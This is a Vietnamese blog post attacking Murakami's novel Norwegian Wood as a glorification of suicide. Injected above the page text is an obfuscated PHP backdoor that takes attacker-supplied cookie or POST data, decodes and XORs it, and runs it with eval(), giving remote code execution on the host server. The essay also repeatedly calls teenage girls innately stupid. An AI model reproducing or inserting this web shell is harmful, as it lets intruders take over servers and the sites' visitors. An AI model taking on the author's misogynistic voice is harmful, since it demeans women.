$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Rừng NaUy hay thứ văn hoá phẩm tởm lợm – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Rừng NaUy hay thứ văn hoá phẩm tởm lợm

Nếu tôi trở thành bộ trưởng Bộ Văn Hoá Thông Tin Việt Nam (tôi không nhớ tên chính xác của Bộ này, nhưng đại loại thế), việc đầu tiên tôi làm sẽ là cấm tiệt những cuốn tiểu thuyết Nhật Bản đương đại, những thứ theo ý kiến của tôi là chẳng làm được việc gì, ngoài đầu độc tâm hồn giới trẻ Việt Nam, đặc biệt là những đứa con gái vốn dĩ đã ngu đần lại hay thích triết lí.

Tôi không phủ nhận, tôi ghét cái trào lưu tiểu thuyết Nhật Bản, vốn như cơn lũ đổ ập vào thị trường Việt Nam tầm vài năm nay, vì bản tính tôi đã không ưa việc tung hô một điều gì thái quá. Nhưng việc không thích cái trào lưu tung hô một thứ gì đó, nó hoàn toàn khác với việc ghét bản thân chính cái thứ đó. Cuốn sách mà tôi tự hứa với lòng là sẽ không bao giờ đọc lần hai là “Kim Dung giữa đời tôi” của Vũ Đức Sao Biển, những bài bình luận mà tôi nhấn ngay Alt – F4 ngay khi vừa đọc cái tiêu đề là những bài bình nhạc Trịnh Công Sơn, chỉ vì những thứ vớ vẩn này dùng hằng hà vô số mỹ tử để gán ghép cho các tác phẩm, mà tôi chắc là vào thời điểm sáng tác, dù trong mơ, những tiểu thuyết gia hay nhạc sĩ của chúng ta cũng không tưởng tượng ra được đến thế.

Lại nhắc về trào lưu tiểu thuyết Nhật Bản, mở màn bằng Rừng Nauy. Tôi một thời tự nhắc bản thân rằng mình phải trở thành con người tốt bụng, nên ra sức dìu dắt, trò chuyện, cố gắng thấu hiểu các bé gái tuổi teen xinh xinh, chỉ đơn thuần là trò chuyện, nói ra kẻo các bạn lại hiểu lầm. Lúc đấy, tôi hết sức ngạc nhiên khi nghe nhiều bé quả quyết với tôi rằng: chưa đọc Rừng NaUy thì chết đi là vừa, đó là cuốn tiểu thuyết của mọi thời đại, vô cùng tuyệt vời, và bô lô ba la tất cả từ mà các bé – bằng đầu óc ngu si đặc trưng của loài gái, có thể nghĩ ra được.

Không phải tôi chưa từng đọc tác các phẩm văn học Nhật Bản, hay những gì viết về Nhật Bản. Ở Châu Á, ngoài Trung Quốc ra, thì Nhật Bản cũng là một nền văn hoá mà tôi thấy thích thú nhất. Cuốn tiểu thuyết Nhật Bản đầu tiên tôi đọc là “Đèn không hắt bóng” của Zunichi Watanabe; đó cũng là lần đầu tiên tôi cảm nhận được sự nghẹt thở bóp nát cả tâm hồn, đến mức nhiều lần, nhìn vào ánh đèn, tôi vẫn tưởng tượng ra cái dáng vẻ đầy lạnh lùng của nhân vật chính ấy. Sau đó, trong một tiết học Văn thời cấp III, như thường lệ, với khá nhiều thời gian rỗi vì chả bao giờ chép bài, tôi ngồi lướt qua cuốn sách và tìm thấy một truyện ngắn Nhật Bản viết về một người phụ nữ và tấm gương, cũng rất u ám và buồn bã. Kể từ hai ấn tượng đó, tôi ít khi nào tìm đọc những cuốn tiểu thuyết của Nhật Bản.

Tôi phá vỡ cái nguyên tắc của mình, chỉ vì nghe người ta xưng tụng Rừng NaUy quá, nên thử tìm xem liệu các tác phẩm Nhật Bản thời hiện đại (lúc bắt đầu đọc, tôi không biết là Rừng NaUy viết về thời những năm 1960, và ra đời vào tầm cuối thập kỉ 80) có thoát khỏi sự u ám và trầm uất ấy chưa. Lai rai, gặm nhắm, rốt cuộc tôi cũng đọc xong nó. Và cảm nhận trong tôi là: hay, nhưng đầy tởm lợm.

Tất nhiên, tôi khinh cuốn Rừng NaUy không phải như một thời người ta đánh nhau sứt đầu mẻ trán để tranh luận xem nó là Sex thuần tuý hay nghệ thuật đích thực. Với tôi, không gọi nó là sex thuần tuý thì cũng may lắm rồi, có những con trời đưa lên hàng nghệ thuật đích thực thì không thể nào hiểu nổi. Nhưng, nhắc lại, đó chỉ là một vấn đề gợn qua trong trí óc tôi, sau đó, tôi cũng không để ý gì đến nó nữa.
Tôi thấy ghét khi đọc Rừng NaUy không phải do cái không khí đầy buồn bã, u uất, đôi khi lên tới nghẹt thở của nó, vì thiếu gì tác phẩm nổi tiếng trên thế giới cũng khiến tôi có cùng cảm nhận như vậy. Ví dụ đơn giản nhất tôi nêu ra là cuốn đầu tiên tôi đọc vào năm lớp 6 “Túp lều bác Tôm”, cũng khiến người đọc trải qua bao phen uất ức, nghẹn ngào, căm phẫn và đồng cảm, đến rơi cả nước mắt (khi Tổng thống Abraham Lincoln gặp tác giả vào năm 1862 đã chào mừng bà bằng câu nói nổi tiếng: “Hóa ra bà chính là người phụ nữ nhỏ bé đã viết cuốn sách làm bùng lên cuộc chiến tranh vĩ đại”).

Điều làm tôi thấy tởm lợm ở đây là cái thứ triết lí ba xu, vớ vẩn của nó, đặc biệt là cái tư tưởng “Bởi vì cái chết là một phần của sự sống và bởi vì sự sống nuôi dưỡng cái chết từng ngày.”

Một cuốn tiểu thuyết mà đề cao sự chết, là một cuốn tiểu thuyết vô nhân đạo. Dù cuộc sống có như thế nào, thì cũng cần phải quí trọng nó, trân trọng vì mình đã được sinh ra. Trên hết mọi thứ trên đời này, sự sống là quí giá nhất.

Dĩ nhiên, tôi mới 22 tuổi đầu, chưa từng xảy ra những biến cố tang thương, cuộc đời chưa từng ném thẳng vào mặt tôi những điều bất hạnh, nên có thể nhiều người sẽ nói: do tôi chưa từng trải qua các cảm giác đó. Vâng, nhưng nếu cứ gặp khó khăn gì, cứ bế tắc lại đi tìm tới sợi dây trong khu rừng vắng, với cái triết lí nửa mùa ở trên, thì dân số thế giới này giảm quá nửa à?

“Cái chết là có thực, nó không phải là đối nghịch của cuộc sống, mà là một phần của cuộc sống.”

Ngu xuẩn. Tại sao một cuốn tiểu thuyết thay vì định hướng con người vượt qua những thời điểm u uất, lại đi rêu rao, đề cao những đứa dám “vượt qua nỗi đau của sự chết”, để rồi thằng thì chui vào xe bật ga hít cho đến chết, con thì cũng khùng khùng điên điên đi theo con đường ấy?

Đã từng có một vài thời điểm, tôi mơ hồ nhận ra cuốn tiểu thuyết này cũng có vài chỗ đẹp, chỗ hay, nhưng những cái cảm giác tởm lợm ấy khi nghĩ về những gì mà nó truyền đạt, lại thổi bay suy nghĩ ấy.

Tởm hơn cả là những người đưa nó về Việt Nam, và ca ngợi, hội thảo, báo chí để phổ biến nó.

Nhật Bản là một quốc gia bại trận sau Đại chiến năm 1945, vì thế, nước họ sản sinh ra một thế hệ, mà như thời Ernest Hemingway gọi là ‘Lost Generation’. Lượng người tự tử ở Nhật Bản luôn là đông nhất thế giới, chính vì thế Anime/ Manga được mọi lứa tuổi ở Nhật ưa thích, vì đó là nơi họ có thể hoá mình vào, trốn tránh cái thực tại đầy bế tắc, u ám xung quanh mình.

Việt Nam không như Nhật Bản, vì thế đem truyện này về Việt Nam, ngoài đầu độc tâm hồn những đứa trẻ đang lớn (lứa tuổi đọc Rừng NaUy nhiều là tầm 20), thì chẳng được gì.

Tôi thấy hơi buồn, khi thay vì tìm tới nền văn học Liên Xô hừng hực niềm tin yêu cuộc sống, với những tác phẩm bất hủ như ‘Thép đã tôi thế đấy’; nền văn học Pháp đầy lãng mạn và hài hước, văn học Anh với nét cổ điển đặc trưng, người ta lại tạo ra trào lưu tìm tới những thứ u uất, nghẹt thở như thế.

Hãy xem Trịnh Lữ nói gì khi dịch cuốn Rừng NaUy: “Và tôi hiểu được tại sao chỉ những nhân vật trung thực trong trắng và dũng cảm trong Rừng Na-uy mới tự kết liễu cuộc đời mình. Họ còn quá trẻ và không đủ kiên nhẫn để hy vọng cuộc đời này sẽ nuôi dưỡng được một cái chết tự nhiên xứng đáng. Và tôi cũng hiểu tại sao nhiều nhà văn lớn của Nhật Bản như Osamu Dazai và Yasunari Kawabata cũng đã chọn cái chết để khỏi phải chứng kiến cái đẹp và cái cao cả đang bị thời cuộc làm nhục.”

Thay vì bắt tay vào thay đổi cuộc đời, thay vì tự mình đứng lên, người ta lại đề cao sự dũng cảm khi tìm tới cái chết.

Chỉ hi vọng rằng lứa tuổi teen chỉ cảm nhận sự u uất đó thôi, không đứa nào ngu đến mức nghĩ “vì cuộc đời này không xứng đáng với những tâm hồn trong trắng, thánh thiện, yêu cái đẹp như ta, nên ta phải chọn cách chết…”

Ôi….

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.